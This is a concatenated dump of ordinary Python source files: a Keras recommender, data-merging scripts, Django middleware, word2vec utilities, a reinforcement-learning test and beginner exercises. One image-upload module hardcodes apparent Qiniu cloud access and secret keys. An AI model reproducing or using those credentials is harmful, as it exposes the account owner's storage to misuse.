tf.keras.layers.Dropout(dropout)(dense_representation)\n\n rating = keras.layers.Dense(1, activation=\"linear\", use_bias=False, kernel_initializer=ScaledGlorotNormal(),\n kernel_regularizer=keras.regularizers.l1_l2(l2=kernel_l2))(\n dense_representation)\n result = 0.0\n if use_implicit:\n result += implicit_term\n if use_dnn:\n rating = keras.layers.ActivityRegularization(l2=bias_regularizer)(rating)\n result += rating\n return result\n\n rating = tf.keras.backend.constant(mu) + user_bias + item_bias + main_network()\n self.log.debug(\"Before Rating Regularization, min-max affinity for DNN = %s\", (min_affinity, max_affinity))\n rating = RatingPredRegularization(l2=rating_regularizer, min_r=min_affinity, max_r=max_affinity)(rating)\n\n model = keras.Model(inputs=inputs, outputs=[rating])\n\n learning_rate = LRSchedule(lr=lr, epochs=epochs, batch_size=batch_size, n_examples=len(user_item_affinities))\n sgd = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=0.9, nesterov=True)\n model.compile(optimizer=sgd,\n loss=[root_mean_squared_error], metrics=[root_mean_squared_error, mean_absolute_error])\n\n model.fit(train, epochs=epochs, callbacks=[], verbose=verbose)\n\n prediction_artifacts = {\"model\": model, \"inverse_fn\": inverse_fn, \"user_item_list\": user_item_list,\n \"item_user_list\": item_user_list,\n \"ratings_count_by_user\": ratings_count_by_user, \"padding_length\": padding_length,\n \"ratings_count_by_item\": ratings_count_by_item,\n \"batch_size\": batch_size, \"svd_uv\": svd_uv, \"svd_iv\": svd_iv, \"use_svd\": use_svd}\n self.log.info(\"Built Prediction Network, model params = %s\", model.count_params())\n return prediction_artifacts\n\n def predict(self, user_item_pairs: List[Tuple[str, str]], clip=True) -> List[float]:\n start = time.time()\n model = self.prediction_artifacts[\"model\"]\n inverse_fn = self.prediction_artifacts[\"inverse_fn\"]\n ratings_count_by_user = self.prediction_artifacts[\"ratings_count_by_user\"]\n ratings_count_by_item = self.prediction_artifacts[\"ratings_count_by_item\"]\n svd_uv = self.prediction_artifacts[\"svd_uv\"]\n svd_iv = self.prediction_artifacts[\"svd_iv\"]\n batch_size = self.prediction_artifacts[\"batch_size\"]\n use_svd = self.prediction_artifacts[\"use_svd\"]\n user_item_list = self.prediction_artifacts[\"user_item_list\"]\n item_user_list = self.prediction_artifacts[\"item_user_list\"]\n padding_length = self.prediction_artifacts[\"padding_length\"]\n\n def generate_prediction_samples(affinities: List[Tuple[str, str]],\n global_user_id_to_index: Dict[str, int],\n global_item_id_to_index: Dict[str, int],\n user_id_to_index: Dict[str, int], item_id_to_index: Dict[str, int],\n user_content_vectors: np.ndarray, item_content_vectors: np.ndarray,\n user_vectors: np.ndarray, item_vectors: np.ndarray,\n svd_uv: np.ndarray, svd_iv: np.ndarray,\n ratings_count_by_user: Counter, ratings_count_by_item: Counter):\n def generator():\n for i, j in affinities:\n user_idx = global_user_id_to_index[i]\n item_idx = global_item_id_to_index[j]\n items = np.array(user_item_list[i])\n items = items[:padding_length]\n items = items + 1\n items = np.pad(items, (padding_length - len(items), 0), constant_values=(0, 0))\n\n users = np.array(item_user_list[j])\n users = users[:padding_length]\n users = users + 1\n users = np.pad(users, (padding_length - len(users), 0), constant_values=(0, 0))\n\n user = user_id_to_index[i]\n item = item_id_to_index[j]\n user_content = user_content_vectors[user]\n item_content = item_content_vectors[item]\n user_collab = user_vectors[user]\n item_collab = item_vectors[item]\n nu = 1 / np.sqrt(ratings_count_by_user[i])\n ni = 1 / np.sqrt(ratings_count_by_item[j])\n ratings_by_user = np.log1p((ratings_count_by_user[i] + 10.0) / 10.0)\n ratings_by_item = np.log1p((ratings_count_by_item[j] + 10.0) / 10.0)\n if use_svd:\n user_svd = svd_uv[user_idx]\n item_svd = svd_iv[item_idx]\n yield user_idx, item_idx, users, items, nu, ni, user_content, item_content, \\\n user_collab, item_collab, user_svd, item_svd, \\\n ratings_by_user, ratings_by_item\n else:\n yield user_idx, item_idx, users, items, nu, ni, user_content, item_content, \\\n user_collab, item_collab, \\\n ratings_by_user, ratings_by_item\n\n return generator\n\n user_ids = list(set([u for u, i in user_item_pairs]))\n item_ids = list(set([i for u, i in user_item_pairs]))\n user_vectors = self.get_embeddings([(u, EntityType.USER) for u in user_ids])\n item_vectors = self.get_embeddings([(i, EntityType.ITEM) for i in item_ids])\n\n user_id_to_index = bidict(zip(user_ids, list(range(len(user_ids)))))\n item_id_to_index = bidict(zip(item_ids, list(range(len(item_ids)))))\n user_vectors = np.array(user_vectors)\n item_vectors = np.array(item_vectors)\n assert user_vectors.shape[0] == len(user_ids)\n assert item_vectors.shape[0] == len(item_ids)\n if self.content_data_used:\n user_content_vectors = user_vectors[:, :self.n_content_dims]\n item_content_vectors = item_vectors[:, :self.n_content_dims]\n assert user_content_vectors.shape[1] == item_content_vectors.shape[1] == self.n_content_dims\n user_vectors = user_vectors[:, self.n_content_dims:]\n item_vectors = item_vectors[:, self.n_content_dims:]\n else:\n user_content_vectors = user_vectors\n item_content_vectors = item_vectors\n\n n_svd_dims = svd_uv.shape[1]\n if use_svd:\n output_shapes = (\n (), (), padding_length, padding_length, (), (), self.n_content_dims, self.n_content_dims,\n self.n_collaborative_dims,\n self.n_collaborative_dims, n_svd_dims, n_svd_dims, (), ())\n output_types = (\n tf.int64, tf.int64, tf.int64, tf.int64, tf.float64, tf.float64, tf.float64, tf.float64, tf.float64,\n tf.float64, tf.float64, tf.float64, tf.float64, tf.float64)\n else:\n output_shapes = (\n (), (), padding_length, padding_length, (), (), self.n_content_dims, self.n_content_dims,\n self.n_collaborative_dims,\n self.n_collaborative_dims, (), ())\n output_types = (\n tf.int64, tf.int64, tf.int64, tf.int64, tf.float64, tf.float64, tf.float64, tf.float64, tf.float64,\n tf.float64, tf.float64, tf.float64)\n predict = tf.data.Dataset.from_generator(generate_prediction_samples(user_item_pairs,\n self.user_id_to_index,\n self.item_id_to_index,\n user_id_to_index, item_id_to_index,\n user_content_vectors, item_content_vectors,\n user_vectors, item_vectors, svd_uv, svd_iv,\n ratings_count_by_user,\n ratings_count_by_item),\n output_types=output_types, output_shapes=output_shapes, )\n predict = predict.batch(batch_size).prefetch(16)\n model_start_time = time.time()\n predictions = np.array(list(flatten([model.predict(x).reshape((-1)) for x in predict])))\n model_end_time = time.time()\n model_time = model_end_time - model_start_time\n assert len(predictions) == len(user_item_pairs)\n users, items = zip(*user_item_pairs)\n invert_start = time.time()\n predictions = inverse_fn([(u, i, r) for u, i, r in zip(users, items, predictions)])\n if clip:\n predictions = np.clip(predictions, self.rating_scale[0], self.rating_scale[1])\n self.log.debug(\n \"Finished Predicting for n_samples = %s, time taken = %.2f, Model Time Taken = %.2f, Invert time = %.2f\",\n len(user_item_pairs), time.time() - start,\n model_time, time.time() - invert_start)\n return predictions\n","sub_path":"hwer/hybrid_recommender_svdpp.py","file_name":"hybrid_recommender_svdpp.py","file_ext":"py","file_size_in_byte":34249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"94494024","text":"import json\n\n'''\n[{\n title:\"title\",\n link : \"link\", \n contents: \"contents\",\n datetime: \"date\"\n},...]\n'''\n\nyears = [2016, 2017, 2018, 2019, 2020, 2021]\ndays_28 = [2]\ndays_31 = [1,3,5,7,8,10,12]\n\ndef ret_days(year, month):\n \n if month in days_31:\n return 31\n elif month in days_28:\n if (year%4 == 0):\n return 29\n else:\n return 28\n else:\n return 30\n\ndef load_jsons(year, month):\n #file name format : \"year-month-1_year-month-enddaysnews.json\"\n file_name = \"{0}-{1}-1_{0}-{1}-{2}news.json\".format(year, month, ret_days(year, month))\n path = './scraper/'+file_name\n with open(path, 'r') as file:\n json_data = json.load(file)\n for arts in json_data:\n arts['content'] = arts['content'].replace(\"\\n\",\" \")\n return json_data\n\nif __name__ == \"__main__\":\n merge_dict_list = []\n for year in years:\n if (year == 2016):\n for month in range(3,13):\n json_data = load_jsons(year, month)\n for data in json_data:\n merge_dict_list.append(data)\n #print(json_data)\n elif (year == 2021):\n for month in range(1,3):\n json_data = load_jsons(year, month)\n for data in json_data:\n merge_dict_list.append(data)\n else:\n for month in range(1,13):\n json_data = load_jsons(year, month)\n for data in json_data:\n merge_dict_list.append(data)\n merge_dict_list = sorted(merge_dict_list, key= lambda k: k['date'], reverse = False)\n with open('merged_data.json', 'w') as merge_file:\n json.dump(merge_dict_list, merge_file, indent=4)","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412062939","text":"#!/usr/bin/python2\n#\n# Chris Lumens \n#\n# Copyright 2007 Red Hat, Inc.\n#\n# This copyrighted material is made available to anyone wishing to use, modify,\n# copy, or redistribute it subject to the terms and conditions of the GNU\n# General Public License v.2. This program is distributed in the hope that it\n# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the\n# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along with\n# this program; if not, write to the Free Software Foundation, Inc., 51\n# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat\n# trademarks that are incorporated in the source code or documentation are not\n# subject to the GNU General Public License and may only be used or replicated\n# with the express permission of Red Hat, Inc. \n#\nfrom constants import *\n\nclass Config:\n def __init__(self):\n self.defaultThemeDir = BASEDIR + \"themes/default/\"\n self.frontend = None\n self.interface = None\n self.mode = MODE_REGULAR\n self.moduleDir = None\n self.moduleList = None\n self.needInterface = False\n self.themeDir = None\n\nconfig = Config()\n","sub_path":"firstboot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"405408177","text":"from django.conf import settings\nfrom django.utils.encoding import smart_str\n\nfrom waffle import FLAGS, COOKIE_NAME, TEST_COOKIE_NAME\n\n\nclass WaffleMiddleware(object):\n def process_request(self, request):\n request.waffles = {}\n request.waffle_tests = {}\n\n if 'waffle_reset' in request.GET:\n # This will reset the cookies in process_response()\n request.waffle_tests.update({name: None for name in FLAGS})\n\n def process_response(self, request, response):\n secure = getattr(settings, 'WAFFLE_SECURE', False)\n max_age = getattr(settings, 'WAFFLE_MAX_AGE', 2592000) # 1 month\n\n if hasattr(request, 'waffles'):\n for k in request.waffles:\n name = smart_str(COOKIE_NAME % k)\n active, rollout = request.waffles[k]\n if rollout and not active:\n # \"Inactive\" is a session cookie during rollout mode.\n age = None\n else:\n age = max_age\n response.set_cookie(name, value=active, max_age=age,\n secure=secure)\n\n if hasattr(request, 'waffle_tests'):\n for k in request.waffle_tests:\n name = smart_str(TEST_COOKIE_NAME % k)\n value = request.waffle_tests[k]\n if value is not None:\n response.set_cookie(name, value=value)\n elif name in request.COOKIES:\n response.delete_cookie(name)\n\n return response\n","sub_path":"waffle/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"228359956","text":"import os\nimport requests\nimport numpy\nimport time\nimport nltk\n\n\nclass Word2Vec:\n __instance = None\n\n @staticmethod\n def get_instance():\n if Word2Vec.__instance is None:\n Word2Vec()\n return Word2Vec.__instance\n\n def __init__(self):\n if Word2Vec.__instance is not None:\n raise Exception(\"This class is a singleton. Call get_instance method.\")\n else:\n Word2Vec.__instance = self\n\n self.model = None\n self.useNorm = False\n self.model_path = '{}/../tmp/word2vec_300.bin'.format(os.path.dirname(os.path.realpath(__file__)))\n self.url = \"http://www.robertoderesu.com/ml/word2vec/word-vec\"\n # self.url = \"http://127.0.0.1:8001/word-vec\"\n self.tokenizer = nltk.tokenize.RegexpTokenizer(r\"\\w{3,}\")\n\n def get_embeddings(self, texts, print_every=None):\n if self.model is None:\n self.load_model()\n\n output = []\n n_texts = len(texts)\n for index, text in enumerate(texts):\n words = self.tokenizer.tokenize(text)\n words_embeddings = []\n\n for word in words:\n if word in self.model.vocab:\n word_embedding = self.model.word_vec(word, self.useNorm)\n words_embeddings.append([x.item() for x in word_embedding])\n\n output.append(words_embeddings)\n\n if print_every is not None and index % print_every == 0:\n print(\"Processed {:0.2f}% {}/{}\".format(index / n_texts * 100, index, n_texts))\n\n return output\n\n def get_embeddings_remote(self, texts):\n n_chunks = max(int(len(texts) / 100 + 1), 1)\n # n_chunks = 1\n chunks = [list(x) for x in numpy.array_split(numpy.array(texts), n_chunks)]\n\n result = []\n for text_chunk in chunks:\n request_data = {\n \"texts\": text_chunk,\n \"useNorm\": False\n }\n response = requests.post(self.url, json=request_data)\n response_data = response.json()\n result.extend(response_data)\n\n return result\n\n def load_model(self):\n print(\"Loading model...\")\n start_time_model = time.time()\n\n import gensim\n self.model = gensim.models.KeyedVectors.load_word2vec_format(self.model_path, binary=True)\n\n end_time_model = time.time()\n print(\"Model loaded! Elapsed: \" + str(end_time_model - start_time_model))\n","sub_path":"models/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"12885510","text":"# 2019-05-27 created with ml_script = \"calculate_enrichment.py\"\n# 2019-07-03 updated with ml_script = \"calculate_enrichment_bootstrap.py\"\n# sarahfong\n\n# using Mary Lauren's script to calculate GTEx eQTL enrichment using the script calculate_enrichment.py\n# FANTOM enhancer architectures were used in this analysis. \n# I copied this script from /dors/capra_lab/users/bentonml/resources/bin/calculate_enrichment.py\n\nimport glob\nimport os, sys\n\ntarget = sys.argv[1] \n\n# /dors/capra_lab/projects/enhancer_ages/eqtl/gtex_v7/Whole_Blood_v7_signif_variant_gene_pairs.bed\n\ntarget_id = (target.split(\"/\")[-1]).split(\".\")[0]\n\n#FANTOM Enhancer Architecture\nfantom_path = \"/dors/capra_lab/projects/enhancer_ages/fantom/data/fantom_enh_age/architecture_coordinates/\"\n\n# ML + bootstrap\nml_script = \"/dors/capra_lab/users/fongsl/enh_age/bin/calculate_enrichment_bootstrap.py\"\n\n# Glob FANTOM enhancer architecture files\nfantom = glob.glob(\"%sFANTOM*.bed\" % fantom_path)\n\n# Make an output file\noutfile = \"/dors/capra_lab/projects/enhancer_ages/eqtl/gtex_FANTOM_%s.txt\" % target_id \ntouch = \"touch %s\" % outfile\nos.system(touch) # make a new output file\n\nfor file in fantom:\n file_name = (file.split(\"/\")[-1]).split(\".\")[0]\n cmd = \"python %s %s %s -o %s -i 500\" %(ml_script, file, target, outfile)\n print(file_name, target_id)\n os.system(cmd)","sub_path":"enhancer_age_complexity/eQTL/gtex_calculate_enrichment.py","file_name":"gtex_calculate_enrichment.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"11225743","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Sergio Rozada Doval\r\n\r\n@description: Test the performance of different models and algorithms\r\n\r\n\"\"\" \r\nimport os,sys,inspect\r\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\r\nparent_dir = os.path.dirname(current_dir)\r\nsys.path.insert(0, parent_dir) \r\n\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport architectures\r\nimport numpy as np\r\nimport dynamics as dn\r\nimport rl\r\n\r\n# Model and reward to test algorithms\r\nmodel_path = \"../models/ddrqn\"\r\nreward_path = \"cummulative_reward_ddrqn.pickle\"\r\n\r\nreward = rl.readData(reward_path)\r\n\r\n# Instances of the environment\r\ngenerator = dn.Node(powerSetPoint=3.15)\r\nload = dn.Node(powerSetPoint=-3.30)\r\narea = dn.Area(frequencySetPoint=50,M=0.1,D=0.0160)\r\narea.calculateDeltaF([generator,load])\r\n\r\n# Define list of powers and frequencies\r\npower = []\r\nfrequencies = []\r\n\r\n# Let's tensorflow this\r\ntf.reset_default_graph()\r\ngraph = tf.train.import_meta_graph(model_path+\".meta\")\r\n\r\nsteps = 100\r\nh_s = 100\r\n\r\nwith tf.Session() as session: \r\n # Restore values of the graph\r\n graph.restore(session, model_path)\r\n \r\n # Create the model\r\n lstm = tf.contrib.rnn.BasicLSTMCell(num_units=h_s,state_is_tuple=True)\r\n net = architectures.drqn(h_s,lstm,'net')\r\n n_params = len(net.network_params)\r\n net.createOpHolder(tf.trainable_variables()[0:n_params],1)\r\n \r\n # Initialize variables and copy params\r\n init = tf.variables_initializer(net.network_params)\r\n session.run(init)\r\n session.run(net.update_network_params)\r\n \r\n # Initial state for the LSTM\r\n state = (np.zeros([1,h_s]),np.zeros([1,h_s]))\r\n \r\n for i in range(steps):\r\n \r\n # Store values \r\n power.append(generator.getPower())\r\n frequencies.append(area.getFrequency())\r\n \r\n # Get state and take the best action\r\n current_f = area.getDeltaF()\r\n \r\n a, new_state = session.run([net.predict,net.rnn_state],\r\n feed_dict={net.inputs:np.array(current_f).reshape(1,1),\r\n net.state_in:state,net.batch_size:1, net.trainLength:1})\r\n a = a[0]\r\n \r\n # Take the action, modify environment and get the reward\r\n generator = rl.setDiscretePower(a,generator)\r\n area.calculateDeltaF([generator,load])\r\n \r\n # Update the state\r\n state = new_state\r\n \r\nplt.figure(1)\r\nplt.scatter(np.arange(len(reward)),reward)\r\nplt.xlabel('Episodes')\r\nplt.ylabel('Cumm. reward per episode')\r\n\r\nplt.figure(2)\r\nplt.plot(power)\r\nplt.plot([3.3]*100)\r\nplt.xlabel('Steps')\r\nplt.ylabel('Power (MW)')\r\nplt.legend(['Agent power','Power setpoint'])\r\n\r\nplt.figure(3)\r\nplt.plot(frequencies)\r\nplt.plot([50]*100)\r\nplt.xlabel('Steps')\r\nplt.ylabel('Frequency (Hz)')\r\nplt.legend(['System frequency','Frequency setpoint'])\r\n","sub_path":"tests/test_ddrqn.py","file_name":"test_ddrqn.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"435996198","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='storeimg',\n version='1.9',\n author='noinlj',\n author_email='noinlj@gmail.com',\n url='https://github.com/noinlijin/storeimg',\n description=u'This is a tool which check for compliance iamge is right for Apple Store specifications',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages= setuptools.find_packages(),\n platforms=[\"all\"],\n # install_requires=['Pillow'],\n classifiers=[\n \"Programming Language :: Python :: 2.7\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n entry_points={\n 'console_scripts': [\n 'storeimg=storeimg:storeimg',\n 'test=storeimg:test'\n ]\n }\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"312707279","text":"# usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pandas as pd\nimport os\nfrom django.conf import settings\nfrom time import time\n\nclass positionClass:\n def __init__(self):\n self = self\n\n def check_positionWords_test(self, df, input_word):\n for index, row in df.iterrows():\n if row['职位'] == input_word:\n return True\n\n if index == df.iterrows() and row['职位'] != input_word:\n return False\n\n def check_positionWords(self, input_word):\n for index, row in settings.ZW.iterrows():\n if row['职位'] == input_word:\n return True\n\n if index == settings.ZW.iterrows() and row['职位'] != input_word:\n return False\n\nif __name__ == '__main__':\n df = pd.read_csv(os.path.join(os.getcwd(),\"backend\",\"api\",\"ocr\",\"application\",\"position.csv\"),encoding='gbk')\n input_word = \"JAVA项目经理\"\n start = time()\n flag = positionClass().check_positionWords_test(df, input_word.lower())\n totaltime = time() - start\n print ('cost: ' + str(totaltime))\n if flag == True:\n print (input_word)\n else:\n print (\"未匹配到记录\")\n \n","sub_path":"backend/api/ocr/application/positions.py","file_name":"positions.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"598896428","text":"from pyecharts.charts import Map,Geo\r\nfrom pyecharts import options as opts\r\n\r\n#将数据处理成列表\r\ndef getmaps(proviences, confirmed):\r\n c_confrimed = confirmed.copy()\r\n c_confrimed.sort(reverse = True)\r\n max_value = c_confrimed[0]\r\n del c_confrimed\r\n\r\n l = [[proviences[i],confirmed[i]] for i in range(len(proviences))]\r\n china_confirm_map = Map(init_opts=opts.InitOpts(width = \"1200px\", height=\"600px\"))\r\n china_confirm_map.set_global_opts(\r\n title_opts=opts.TitleOpts(title=\"2019-nCov\"),\r\n visualmap_opts=opts.VisualMapOpts(max_=max_value) #最大数据范围\r\n )\r\n china_confirm_map.add(\"2019-nCov全国各省感染人数\", l, maptype=\"china\")\r\n return china_confirm_map\r\n","sub_path":"team/team5/project/pycharts_utils.py","file_name":"pycharts_utils.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426750796","text":"#Library Fine\n\ntarih1=list(map(int,input().split())) #returned date\ntarih2=list(map(int,input().split())) #due date\n\nif tarih1[2]>tarih2[2]: #yil buyukse\n print(\"10000\")\nelif tarih1[2]tarih2[1]: #ay gecmisse\n print(500*(tarih1[1]-tarih2[1]))\nelif tarih1[1]tarih2[0]: #gun gecmisse\n print(15*(tarih1[0]-tarih2[0]))\nelse:\n print(0)\n\n#Cut the sticks\n\nn = int(input())\narr = list(map(int, input().rstrip().split()))\n\nwhile len(arr)>0:\n print(len(arr))\n liste=[i-min(arr) for i in arr if (i-min(arr))>0]\n arr=liste[:]\n\n#nonDivisibleSubset\narr1=list(map(int,input().strip().split()))\narr2=list(map(int,input().strip().split()))\ndef nonDivisible(k,arr):\n f = [0]*k\n res=0\n for i in range(len(arr)):\n f[arr[i] % k] += 1\n if (k% 2 == 0) and f[k/ 2]:\n res +=1\n if f[0]:\n res +=1\n for i in range(1, (k // 2) + 1):\n res += max(f[i], f[k - i])\n return res\n\nprint(nonDivisible(arr1[1], arr2))\n","sub_path":"hafta_15.py","file_name":"hafta_15.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"197225597","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom qiniu import Auth,put_data\n\n# 需要填写的Access Key 和 Secret_key\naccess_key = 'yV4GmNBLOgQK-1Sn3o4jktGLFdFSrlywR2C-hvsW'\nsecret_key = 'bixMURPL6tHjrb8QKVg2tm7n9k8C7vaOeQ4MEoeW'\n\n# 要上传的空间\nbucket_name = 'ihome'\n\ndef upload_image(data):\n \"\"\"七牛云存储上传文件接口\"\"\"\n\n if not data:\n return None\n try:\n # 构建健全对象\n q = Auth(access_key, secret_key)\n\n # 生成上传 Token,可以指定过期时间等\n token = q.upload_token(bucket_name)\n\n # 上传文件\n ret, info = put_data(token, None, data)\n\n except Exception as e:\n logging.error(e)\n raise e\n\n if 200 == info.status_code:\n\n\n # 返回七牛云中保存图片\n return ret['key']\n else:\n raise Exception('上传文件到七牛云失')\n\nif __name__ == '__main__':\n path = '/home/python/Desktop/fruit.jpg'\n with open(path,'rb') as file:\n upload_image(file.read())\n\n","sub_path":"utils/image_storage.py","file_name":"image_storage.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"554062487","text":"import numpy as np\nfrom skimage import img_as_float\nfrom skimage.exposure import rescale_intensity\nimport skimage.draw\n\ndef mark_with_circle(image : np.ndarray, r: np.float64, c: np.float64, color: str) -> np.ndarray:\n rgb_lookup = {\n 'red': np.array([255, 0, 0]),\n 'green': np.array([0, 255, 0]),\n 'blue': np.array([0, 0, 255])\n }\n new_image = np.copy(image)\n rr, cc = circle(r, c, radius=2)\n new_image[rr, cc] = rgb_lookup[color]\n return new_image\n\ndef mark_two(img0, x1, y1, x2, y2):\n img1 = mark_with_circle(img0, y1, x1, 'red')\n img2 = mark_with_circle(img1, y2, x2, 'blue')\n return img2\n\ndef get_major_axis_line(center, orientation, length=2):\n (cy, cx) = center\n (dx, dy) = (length * np.cos(orientation), length * np.sin(orientation))\n xs = [cx + dx, cx - dx]\n ys = [cy - dy, cy + dy]\n return (xs, ys)\n\ndef draw_extension(annotate_image, center, orientation, length=10, fill=0.5):\n \"\"\"\n Draws lines extending from a center of a length and orientation.\n\n Parameters\n ----------\n annotate_image : ndarray image\n The image to annotate\n center : array-like, length = 2\n The center of the line, in (row, column) format; will be converted to\n integer values\n orientation : float\n The orientation of the line, in radians. In some format.\n length : float (optional, default = 10)\n The length of the line on each side\n fill : whatever the image dtype is (optional, default = 0.5)\n The value to which each line pixel is set\n\n Returns\n -------\n A copy of the original image with the appropriate line drawn.\n \"\"\"\n scaled = np.copy(rescale_intensity(img_as_float(annotate_image)))\n cs = get_major_axis_line(tuple(center), orientation, length=length)\n ([x0, x1], [y0, y1]) = cs\n line = skimage.draw.line(int(y0), int(x0), int(y1), int(x1))\n for (r, c) in zip(*line):\n try:\n scaled[r, c] = fill\n except IndexError:\n pass\n return scaled\n\ndef extend_blobs(binary_image, annotate_image, length=10):\n new_image = np.copy(rescale_intensity(img_as_float(annotate_image)))\n for blob in get_blobs(binary_image):\n new_image = draw_extension(new_image, blob.centroid, blob.orientation, length=length)\n return new_image\n","sub_path":"mwCode/markers.py","file_name":"markers.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"136727267","text":"import numpy as np\n\n# Basic logistic regression\ndef logistic_regression(X, y, lr=0.1, steps=1000):\n '''Calculates the weight matrix for y^hat = \\sigma(Wx + b)\n In the last column of the matrix are the bias weights\n \n - parameters::\n\n :param X: matrix of features (every observation is a row)\n :param y: matrix of targets\n :return: weight matrix\n :rtype: numpy ndarray\n '''\n \n m,n = X.shape # m: number of observations, n: number of features\n n += 1 # add the bias\n \n # initialize random weights \n W = (1/np.sqrt(n))*np.random.rand(n, y.shape[1]) # initialization trick\n \n X_ = np.zeros((m, n))\n X_[:,:-1] = X\n X_[:,-1] = 1 \n \n # Stochastic gradient descent\n for i in np.arange(steps):\n y_given_x = evaluate_logreg(X_[:,:-1], W)\n loss = 0.5*(np.sum(np.square(y_given_x - y)))/m\n print(\"Loss at epoch {0}: {1}\".format(i, loss))\n diff = y_given_x.T - y.T\n dsigmoid = y_given_x.T.dot(1 - y_given_x)\n dW = (np.dot(diff, X_))*dsigmoid/m\n W = W - lr*dW.T\n \n return W\n \ndef sigmoid(x):\n '''Calculates sigmoid function given x\n \n - parameters::\n\n :param x: numeric value or array\n :return: function evaluation\n :rtype: float or ndarray\n '''\n \n return 1/(np.exp(-x) + 1) # elementwise evaluation\n \ndef evaluate_logreg(X, W):\n ''' Evaluate the logistic function given the weights and the input\n \n - parameters::\n\n :param X: matrix of inputs (rows are observations, cols are features)\n :return: function evaluation\n :rtype: float or ndarray\n '''\n m,n = X.shape\n n += 1\n X_ = np.zeros((m, n))\n X_[:,:-1] = X\n X_[:,-1] = 1 \n return sigmoid(X_.dot(W))","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432959056","text":"# Empty list for storiing aliens\naliens = []\n\nnum_aliens = int(input(\"How many aliens do youn want? \"))\n\n# Make x Aliens based on input\nfor alien_number in range(num_aliens):\n new_alien = {\"color\": \"green\", \"points\": 5, \"speed\": \"slow\"}\n aliens.append(new_alien)\n\nfor alien in aliens[0::3]:\n if alien[\"color\"] == \"green\":\n alien[\"color\"] = \"yellow\"\n alien[\"speed\"] = \"medium\"\n alien[\"points\"] = 10\n elif alien[\"color\"] == \"yellow\":\n alien[\"color\"] = \"red\"\n alien[\"speed\"] = \"fast\"\n alien[\"points\"] = 15\n\n# Show the first 5 Aliens\nfor alien in aliens[:20]:\n print(alien)\nprint(\"...\")\n\n# Show how many aliens have been created.\nprint(f\"Total number of aliens: {len(aliens)}\")\n","sub_path":"python_work/chapter06/aliens.py","file_name":"aliens.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"537924186","text":"\"\"\"\nQuestion 1:\n\"\"\"\n\n\ndef crazy_about_9(a, b):\n if a == 9:\n return True\n elif b == 9:\n return True\n elif abs (a - b) == 9 or a+b == 9:\n return True\n else:\n return False\n\nprint(crazy_about_9(2, 9))\nprint(crazy_about_9(4, 5))\nprint(crazy_about_9(3, 8))\n\n\n\"\"\"\n-----------------------------------------------------------------------\nQuestion 2:\nA year with 366 days is called a leap year. Leap years are necessary to\nkeep the calendar synchronized with the sun because the earth revolves\naround the sun once every 365.25 days. Actually, that figure is not\nentirely precise, and for all dates after 1582 the Gregorian correction\napplies. Usually years that are divisible by 4 are leap years, for\nexample 1996. However, years that are divisible by 100 (for example,\n1900) are not leap years, but years that are divisible by 400 are leap\nyears (for example, 2000).\n\"\"\"\n\n\ndef leap_year(year):\n if year % 400 == 0:\n return \"leap_year\"\n elif year % 100 == 0:\n return ('False')\n if year % 4 == 0:\n return ('leap_year')\n else:\n return \"False\"\n\n\nprint(leap_year(1900))\nprint(leap_year(2016))\nprint(leap_year(2017))\nprint(leap_year(2000))\n\n\n\"\"\"\n-----------------------------------------------------------------------\nQuestion 3:\nWrite a function with loops that computes The sum of all squares between\n1 and n (inclusive).\n\"\"\"\ndef sum_squaress(n):\n for squares in range(1,n):\n return sum(range(1, 